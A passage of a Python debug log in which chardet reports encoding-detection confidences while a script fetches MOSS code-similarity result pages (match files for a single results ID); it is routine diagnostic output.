not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40762\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5626135177179191\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21985\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26-0.html\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21985\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21986\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21985\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5290601551539237\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36841\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36842\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36841\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP 
not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616347080687375\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5576615334671211\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32-0.html\nDEBUG:root:Processing 
URL: http://moss.stanford.edu/results/374137986/match32-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19112\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17972\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19581\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17059\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17959\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19568\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17046\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20457\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19112\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17972\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19581\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17059\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20444\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17959\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20457\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17046\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36841\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19568\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17959\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20444\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17046\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36854\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19100\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19568\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17960\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20444\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17047\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19099\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19569\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17959\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20445\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17046\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36841\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19568\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20444\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not 
active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36842\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36841\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5296828800687878\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5195853478593226\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5283924269621537\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5572202123261181\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20101\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20088\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19073\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16309\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20101\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16296\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20088\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16309\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20088\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16296\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 
0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16296\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not 